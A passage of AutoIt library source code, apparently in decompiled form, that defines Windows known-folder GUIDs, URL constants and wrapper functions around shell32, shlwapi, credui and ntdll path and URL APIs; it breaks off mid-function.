GLOBAL CONST $FOLDERID_NETHOOD = "{C5ABBF53-E17F-4121-8900-86626FC2C973}" GLOBAL CONST $FOLDERID_NETWORKFOLDER = "{D20BEEC4-5CA8-4905-AE3B-BF251EA09B53}" GLOBAL CONST $FOLDERID_ORIGINALIMAGES = "{2C36C0AA-5812-4B87-BFD0-4CD0DFB19B39}" GLOBAL CONST $FOLDERID_PHOTOALBUMS = "{69D2CF90-FC33-4FB7-9A0C-EBB0F0FCB43C}" GLOBAL CONST $FOLDERID_PICTURESLIBRARY = "{A990AE9F-A03B-4E80-94BC-9912D7504104}" GLOBAL CONST $FOLDERID_PICTURES = "{33E28130-4E1E-4676-835A-98395C3BC3BB}" GLOBAL CONST $FOLDERID_PLAYLISTS = "{DE92C1C7-837F-4F69-A3BB-86E631204A23}" GLOBAL CONST $FOLDERID_PRINTERSFOLDER = "{76FC4E2D-D6AD-4519-A663-37BD56068185}" GLOBAL CONST $FOLDERID_PRINTHOOD = "{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}" GLOBAL CONST $FOLDERID_PROFILE = "{5E6C858F-0E22-4760-9AFE-EA3317B67173}" GLOBAL CONST $FOLDERID_PROGRAMDATA = "{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}" GLOBAL CONST $FOLDERID_PROGRAMFILES = "{905E63B6-C1BF-494E-B29C-65B732D3D21A}" GLOBAL CONST $FOLDERID_PROGRAMFILESX64 = "{6D809377-6AF0-444B-8957-A3773F02200E}" GLOBAL CONST $FOLDERID_PROGRAMFILESX86 = "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMON = "{F7F1ED05-9F6D-47A2-AAAE-29D317C6F066}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMONX64 = "{6365D5A7-0F0D-45E5-87F6-0DA56B6A4F7D}" GLOBAL CONST $FOLDERID_PROGRAMFILESCOMMONX86 = "{DE974D24-D9C6-4D3E-BF91-F4455120B917}" GLOBAL CONST $FOLDERID_PROGRAMS = "{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}" GLOBAL CONST $FOLDERID_PUBLIC = "{DFDF76A2-C82A-4D63-906A-5644AC457385}" GLOBAL CONST $FOLDERID_PUBLICDESKTOP = "{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}" GLOBAL CONST $FOLDERID_PUBLICDOCUMENTS = "{ED4824AF-DCE4-45A8-81E2-FC7965083634}" GLOBAL CONST $FOLDERID_PUBLICDOWNLOADS = "{3D644C9B-1FB8-4F30-9B45-F670235F79C0}" GLOBAL CONST $FOLDERID_PUBLICGAMETASKS = "{DEBF2536-E1A8-4C59-B6A2-414586476AEA}" GLOBAL CONST $FOLDERID_PUBLICLIBRARIES = "{48DAF80B-E6CF-4F4E-B800-0E69D84EE384}" GLOBAL CONST $FOLDERID_PUBLICMUSIC = "{3214FAB5-9757-4298-BB61-92A9DEAA44FF}" GLOBAL CONST $FOLDERID_PUBLICPICTURES = "{B6EBFB86-6907-413C-9AF7-4FC2ABF07CC5}" GLOBAL CONST $FOLDERID_PUBLICRINGTONES = "{E555AB60-153B-4D17-9F04-A5FE99FC15EC}" GLOBAL CONST $FOLDERID_PUBLICVIDEOS = "{2400183A-6185-49FB-A2D8-4A392A602BA3}" GLOBAL CONST $FOLDERID_QUICKLAUNCH = "{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}" GLOBAL CONST $FOLDERID_RECENT = "{AE50C081-EBD2-438A-8655-8A092E34987A}" GLOBAL CONST $FOLDERID_RECORDEDTVLIBRARY = "{1A6FDBA2-F42D-4358-A798-B74D745926C5}" GLOBAL CONST $FOLDERID_RECYCLEBINFOLDER = "{B7534046-3ECB-4C18-BE4E-64CD4CB7D6AC}" GLOBAL CONST $FOLDERID_RESOURCEDIR = "{8AD10C31-2ADB-4296-A8F7-E4701232C972}" GLOBAL CONST $FOLDERID_RINGTONES = "{C870044B-F49E-4126-A9C3-B52A1FF411E8}" GLOBAL CONST $FOLDERID_ROAMINGAPPDATA = "{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}" GLOBAL CONST $FOLDERID_SAMPLEMUSIC = "{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}" GLOBAL CONST $FOLDERID_SAMPLEPICTURES = "{C4900540-2379-4C75-844B-64E6FAF8716B}" GLOBAL CONST $FOLDERID_SAMPLEPLAYLISTS = "{15CA69B3-30EE-49C1-ACE1-6B5EC372AFB5}" GLOBAL CONST $FOLDERID_SAMPLEVIDEOS = "{859EAD94-2E85-48AD-A71A-0969CB56A6CD}" GLOBAL CONST $FOLDERID_SAVEDGAMES = "{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}" GLOBAL CONST $FOLDERID_SAVEDSEARCHES = "{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}" GLOBAL CONST $FOLDERID_SEARCH_CSC = "{EE32E446-31CA-4ABA-814F-A5EBD2FD6D5E}" GLOBAL CONST $FOLDERID_SEARCH_MAPI = "{98EC0E18-2098-4D44-8644-66979315A281}" GLOBAL CONST $FOLDERID_SEARCHHOME = "{190337D1-B8CA-4121-A639-6D472D16972A}" GLOBAL CONST $FOLDERID_SENDTO = "{8983036C-27C0-404B-8F08-102D10DCFD74}" GLOBAL CONST $FOLDERID_SIDEBARDEFAULTPARTS = "{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}" GLOBAL CONST $FOLDERID_SIDEBARPARTS = "{A75D362E-50FC-4FB7-AC2C-A8BEAA314493}" GLOBAL CONST $FOLDERID_STARTMENU = "{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}" GLOBAL CONST $FOLDERID_STARTUP = "{B97D20BB-F46A-4C97-BA10-5E3608430854}" GLOBAL CONST $FOLDERID_SYNCMANAGERFOLDER = "{43668BF8-C14E-49B2-97C9-747784D784B7}" GLOBAL CONST $FOLDERID_SYNCRESULTSFOLDER = "{289A9A43-BE44-4057-A41B-587A76D7E7F9}" GLOBAL CONST $FOLDERID_SYNCSETUPFOLDER = "{0F214138-B1D3-4A90-BBA9-27CBC0C5389A}" GLOBAL CONST $FOLDERID_SYSTEM = "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}" GLOBAL CONST $FOLDERID_SYSTEMX86 = "{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}" GLOBAL CONST $FOLDERID_TEMPLATES = "{A63293E8-664E-48DB-A079-DF759E0509F7}" GLOBAL CONST $FOLDERID_USERPINNED = "{9E3995AB-1F9C-4F13-B827-48B24B6C7174}" GLOBAL CONST $FOLDERID_USERPROFILES = "{0762D272-C50A-4BB0-A382-697DCD729B80}" GLOBAL CONST $FOLDERID_USERPROGRAMFILES = "{5CD7AEE2-2219-4A67-B85D-6C9CE15660CB}" GLOBAL CONST $FOLDERID_USERPROGRAMFILESCOMMON = "{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}" GLOBAL CONST $FOLDERID_USERSFILES = "{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}" GLOBAL CONST $FOLDERID_USERSLIBRARIES = "{A302545D-DEFF-464B-ABE8-61C8648D939B}" GLOBAL CONST $FOLDERID_VIDEOS = "{18989B1D-99B5-455B-841C-AB7C74E4DDFC}" GLOBAL CONST $FOLDERID_VIDEOSLIBRARY = "{491E922F-5643-4AF4-A7EB-4E7A138D8174}" GLOBAL CONST $FOLDERID_WINDOWS = "{F38BF404-1D43-42F2-9305-67DE0B28FC23}" GLOBAL CONST $KF_FLAG_ALIAS_ONLY = 2147483648 GLOBAL CONST $KF_FLAG_CREATE = 32768 GLOBAL CONST $KF_FLAG_DONT_VERIFY = 16384 GLOBAL CONST $KF_FLAG_DONT_UNEXPAND = 8192 GLOBAL CONST $KF_FLAG_NO_ALIAS = 4096 GLOBAL CONST $KF_FLAG_INIT = 2048 GLOBAL CONST $KF_FLAG_DEFAULT_PATH = 1024 GLOBAL CONST $KF_FLAG_NO_APPCONTAINER_REDIRECTION = 65536 GLOBAL CONST $KF_FLAG_NOT_PARENT_RELATIVE = 512 GLOBAL CONST $KF_FLAG_SIMPLE_IDLIST = 256 GLOBAL CONST $URL_SCHEME_INVALID = + 4294967295 GLOBAL CONST $URL_SCHEME_UNKNOWN = 0 GLOBAL CONST $URL_SCHEME_FTP = 1 GLOBAL CONST $URL_SCHEME_HTTP = 2 GLOBAL CONST $URL_SCHEME_GOPHER = 3 GLOBAL CONST $URL_SCHEME_MAILTO = 4 GLOBAL CONST $URL_SCHEME_NEWS = 5 GLOBAL CONST $URL_SCHEME_NNTP = 6 GLOBAL CONST $URL_SCHEME_TELNET = 7 GLOBAL CONST $URL_SCHEME_WAIS = 8 GLOBAL CONST $URL_SCHEME_FILE = 9 GLOBAL CONST $URL_SCHEME_MK = 10 GLOBAL CONST $URL_SCHEME_HTTPS = 11 GLOBAL CONST $URL_SCHEME_SHELL = 12 GLOBAL CONST $URL_SCHEME_SNEWS = 13 GLOBAL CONST $URL_SCHEME_LOCAL = 14 GLOBAL CONST $URL_SCHEME_JAVASCRIPT = 15 GLOBAL CONST $URL_SCHEME_VBSCRIPT = 16 GLOBAL CONST $URL_SCHEME_ABOUT = 17 GLOBAL CONST $URL_SCHEME_RES = 18 GLOBAL CONST $URL_SCHEME_MSSHELLROOTED = 19 GLOBAL CONST $URL_SCHEME_MSSHELLIDLIST = 20 GLOBAL CONST $URL_SCHEME_MSHELP = 21 GLOBAL CONST $URL_SCHEME_MSSHELLDEVICE = 22 GLOBAL CONST $URL_SCHEME_WILDCARD = 23 GLOBAL CONST $URL_SCHEME_SEARCH_MS = 24 GLOBAL CONST $URL_SCHEME_SEARCH = 25 GLOBAL CONST $URL_SCHEME_KNOWNFOLDER = 26 GLOBAL CONST $GCT_INVALID = 0 GLOBAL CONST $GCT_LFNCHAR = 1 GLOBAL CONST $GCT_SEPARATOR = 8 GLOBAL CONST $GCT_SHORTCHAR = 2 GLOBAL CONST $GCT_WILD = 4 GLOBAL CONST $URL_APPLY_DEFAULT = 1 GLOBAL CONST $URL_APPLY_GUESSSCHEME = 2 GLOBAL CONST $URL_APPLY_GUESSFILE = 4 GLOBAL CONST $URL_APPLY_FORCEAPPLY = 8 GLOBAL CONST $URL_DONT_SIMPLIFY = 134217728 GLOBAL CONST $URL_ESCAPE_AS_UTF8 = 262144 GLOBAL CONST $URL_ESCAPE_PERCENT = 4096 GLOBAL CONST $URL_ESCAPE_SPACES_ONLY = 67108864 GLOBAL CONST $URL_ESCAPE_UNSAFE = 536870912 GLOBAL CONST $URL_NO_META = 134217728 GLOBAL CONST $URL_PLUGGABLE_PROTOCOL = 1073741824 GLOBAL CONST $URL_UNESCAPE = 268435456 GLOBAL CONST $URL_PART_HOSTNAME = 2 GLOBAL CONST $URL_PART_PASSWORD = 4 GLOBAL CONST $URL_PART_PORT = 5 GLOBAL CONST $URL_PART_QUERY = 6 GLOBAL CONST $URL_PART_SCHEME = 1 GLOBAL CONST $URL_PART_USERNAME = 3 GLOBAL CONST $URLIS_APPLIABLE = 4 GLOBAL CONST $URLIS_DIRECTORY = 5 GLOBAL CONST $URLIS_FILEURL = 3 GLOBAL CONST $URLIS_HASQUERY = 6 GLOBAL CONST $URLIS_NOHISTORY = 2 GLOBAL CONST $URLIS_OPAQUE = 1 GLOBAL CONST $URLIS_URL = 0 #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_COMMANDLINETOARGV ($SCMD ) LOCAL $ARESULT [1 ] = [0 ] $SCMD = STRINGSTRIPWS ($SCMD , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF NOT $SCMD THEN RETURN $ARESULT ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "ptr" , "CommandLineToArgvW" , "wstr" , $SCMD , "int*" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR (NOT $ARET [2 ] ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TPTR = DLLSTRUCTCREATE ("ptr[" & $ARET [2 ] & "]" , $ARET [0 ] ) DIM $ARESULT [$ARET [2 ] + 1 ] = [$ARET [2 ] ] FOR $I = 1 TO $ARET [2 ] $ARESULT [$I ] = _WINAPI_GETSTRING (DLLSTRUCTGETDATA ($TPTR , 1 , $I ) ) NEXT DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $ARET [0 ] ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_ISNAMEINEXPRESSION ($SSTRING , $SPATTERN , $BCASESENSITIVE = FALSE ) IF NOT $BCASESENSITIVE THEN $SPATTERN = STRINGUPPER ($SPATTERN ) LOCAL $TUS1 = __US ($SPATTERN ) LOCAL $TUS2 = __US ($SSTRING ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "boolean" , "RtlIsNameInExpression" , "struct*" , $TUS1 , "struct*" , $TUS2 , "boolean" , NOT $BCASESENSITIVE , "ptr" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PARSEURL ($SURL ) LOCAL $TAGPARSEDURL = "dword Size;ptr Protocol;uint cchProtocol;ptr Suffix;uint cchSuffix;uint Scheme" LOCAL $TPURL = DLLSTRUCTCREATE ($TAGPARSEDURL ) DLLSTRUCTSETDATA ($TPURL , 1 , DLLSTRUCTGETSIZE ($TPURL ) ) LOCAL $TURL = DLLSTRUCTCREATE ("wchar[4096]" ) DLLSTRUCTSETDATA ($TURL , 1 , $SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "ParseURLW" , "struct*" , $TURL , "struct*" , $TPURL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $ARESULT [3 ] $ARESULT [0 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & DLLSTRUCTGETDATA ($TPURL , 3 ) & "]" , DLLSTRUCTGETDATA ($TPURL , 2 ) ) , 1 ) $ARESULT [1 ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & DLLSTRUCTGETDATA ($TPURL , 5 ) & "]" , DLLSTRUCTGETDATA ($TPURL , 4 ) ) , 1 ) $ARESULT [2 ] = DLLSTRUCTGETDATA ($TPURL , 6 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_PARSEUSERNAME ($SUSER ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIParseUserNameW" , "wstr" , $SUSER , "wstr" , "" , "ulong" , 4096 , "wstr" , "" , "ulong" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) SWITCH $ARET [0 ] CASE 0 CASE 1315 IF STRINGSTRIPWS ($SUSER , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $ARET [2 ] = $SUSER $ARET [4 ] = "" ELSE CONTINUECASE ENDIF CASE ELSE RETURN SETERROR (10 , $ARET [0 ] , 0 ) ENDSWITCH LOCAL $ARESULT [2 ] $ARESULT [0 ] = $ARET [4 ] $ARESULT [1 ] = $ARET [2 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PATHADDBACKSLASH ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathAddBackslashW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHADDEXTENSION ($SFILEPATH , $SEXT = "" ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $STYPEOFEXT = "wstr" IF NOT STRINGSTRIPWS ($SEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFEXT = "ptr" $SEXT = 0 ENDIF LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathAddExtensionW" , "struct*" , $TPATH , $STYPEOFEXT , $SEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , DLLSTRUCTGETDATA ($TPATH , 1 ) ) ENDFUNC FUNC _WINAPI_PATHAPPEND ($SFILEPATH , $SMORE ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathAppendW" , "struct*" , $TPATH , "wstr" , $SMORE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHBUILDROOT ($IDRIVE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathBuildRootW" , "wstr" , "" , "int" , $IDRIVE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCANONICALIZE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCanonicalizeW" , "wstr" , "" , "wstr" , $SFILEPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , $SFILEPATH ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCOMMONPREFIX ($SPATH1 , $SPATH2 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathCommonPrefixW" , "wstr" , $SPATH1 , "wstr" , $SPATH2 , "wstr" , "" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , $ARET [3 ] ) ENDFUNC FUNC _WINAPI_PATHCOMPACTPATH ($HWND , $SFILEPATH , $IWIDTH = 0 ) IF $IWIDTH < 1 THEN LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLCALL ("user32.dll" , "bool" , "GetClientRect" , "hwnd" , $HWND , "struct*" , $TRECT ) $IWIDTH += DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , $SFILEPATH ) LOCAL $HDC = $ARET [0 ] LOCAL CONST $WM_GETFONT = 49 $ARET = DLLCALL ("user32.dll" , "ptr" , "SendMessage" , "hwnd" , $HWND , "uint" , $WM_GETFONT , "wparam" , 0 , "lparam" , 0 ) LOCAL $HBACK = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $ARET [0 ] ) LOCAL $IERROR = 0 $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCompactPathW" , "handle" , $HDC , "wstr" , $SFILEPATH , "int" , $IWIDTH ) IF @ERROR OR NOT $ARET [0 ] THEN $IERROR = @ERROR + 10 DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $HBACK [0 ] ) DLLCALL ("user32.dll" , "int" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , $SFILEPATH ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHCOMPACTPATHEX ($SFILEPATH , $IMAX ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathCompactPathExW" , "wstr" , "" , "wstr" , $SFILEPATH , "uint" , $IMAX + 1 , "dword" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , $SFILEPATH ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHCREATEFROMURL ($SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "PathCreateFromUrlW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHFINDEXTENSION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "wstr" , "PathFindExtensionW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHFINDFILENAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "wstr" , "PathFindFileNameW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , $SFILEPATH ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHFINDNEXTCOMPONENT ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathFindNextComponentW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHFINDONPATH (CONST $SFILEPATH , $AEXTRAPATHS = "" , CONST $SPATHDELIMITER = @LF ) LOCAL $IEXTRACOUNT = 0 IF ISSTRING ($AEXTRAPATHS ) THEN IF STRINGLEN ($AEXTRAPATHS ) THEN $AEXTRAPATHS = STRINGSPLIT ($AEXTRAPATHS , $SPATHDELIMITER , $STR_ENTIRESPLIT + $STR_NOCOUNT ) $IEXTRACOUNT = UBOUND ($AEXTRAPATHS , $UBOUND_ROWS ) ENDIF ELSEIF ISARRAY ($AEXTRAPATHS ) THEN $IEXTRACOUNT = UBOUND ($AEXTRAPATHS ) ENDIF LOCAL $TPATHS , $TPATHPTRS IF $IEXTRACOUNT THEN LOCAL $TAGSTRUCT = "" FOR $PATH IN $AEXTRAPATHS $TAGSTRUCT &= "wchar[" & STRINGLEN ($PATH ) + 1 & "];" NEXT $TPATHS = DLLSTRUCTCREATE ($TAGSTRUCT ) $TPATHPTRS = DLLSTRUCTCREATE ("ptr[" & $IEXTRACOUNT + 1 & "]" ) FOR $I = 1 TO $IEXTRACOUNT DLLSTRUCTSETDATA ($TPATHS , $I , $AEXTRAPATHS [$I + 4294967295 ] ) DLLSTRUCTSETDATA ($TPATHPTRS , 1 , DLLSTRUCTGETPTR ($TPATHS , $I ) , $I ) NEXT DLLSTRUCTSETDATA ($TPATHPTRS , 1 , PTR (0 ) , $IEXTRACOUNT + 1 ) ENDIF LOCAL $ARESULT = DLLCALL ("shlwapi.dll" , "bool" , "PathFindOnPathW" , "wstr" , $SFILEPATH , "struct*" , $TPATHPTRS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , $SFILEPATH ) RETURN $ARESULT [1 ] ENDFUNC FUNC _WINAPI_PATHGETARGS ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathGetArgsW" , "struct*" , $TPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHGETCHARTYPE ($SCHAR ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "uint" , "PathGetCharTypeW" , "word" , ASCW ($SCHAR ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHGETDRIVENUMBER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathGetDriveNumberW" , "wstr" , $SFILEPATH ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN CHR ($ARET [0 ] + 65 ) & ":" ENDFUNC FUNC _WINAPI_PATHISCONTENTTYPE ($SFILEPATH , $STYPE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsContentTypeW" , "wstr" , $SFILEPATH , "wstr" , $STYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISEXE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "PathIsExe" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISLFNFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsLFNFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISRELATIVE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsRelativeW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISROOT ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsRootW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISSAMEROOT ($SPATH1 , $SPATH2 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsSameRootW" , "wstr" , $SPATH1 , "wstr" , $SPATH2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISSYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsSystemFolderW" , "wstr" , $SFILEPATH , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNCSERVER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCServerW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHISUNCSERVERSHARE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsUNCServerShareW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHMAKESYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathMakeSystemFolderW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHMATCHSPEC ($SFILEPATH , $SSPEC ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathMatchSpecW" , "wstr" , $SFILEPATH , "wstr" , $SSPEC ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHPARSEICONLOCATION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "PathParseIconLocationW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $ARESULT [2 ] $ARESULT [0 ] = $ARET [1 ] $ARESULT [1 ] = $ARET [0 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PATHRELATIVEPATHTO ($SPATHFROM , $BDIRFROM , $SPATHTO , $BDIRTO ) IF $BDIRFROM THEN $BDIRFROM = 16 ENDIF IF $BDIRTO THEN $BDIRTO = 16 ENDIF LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRelativePathToW" , "wstr" , "" 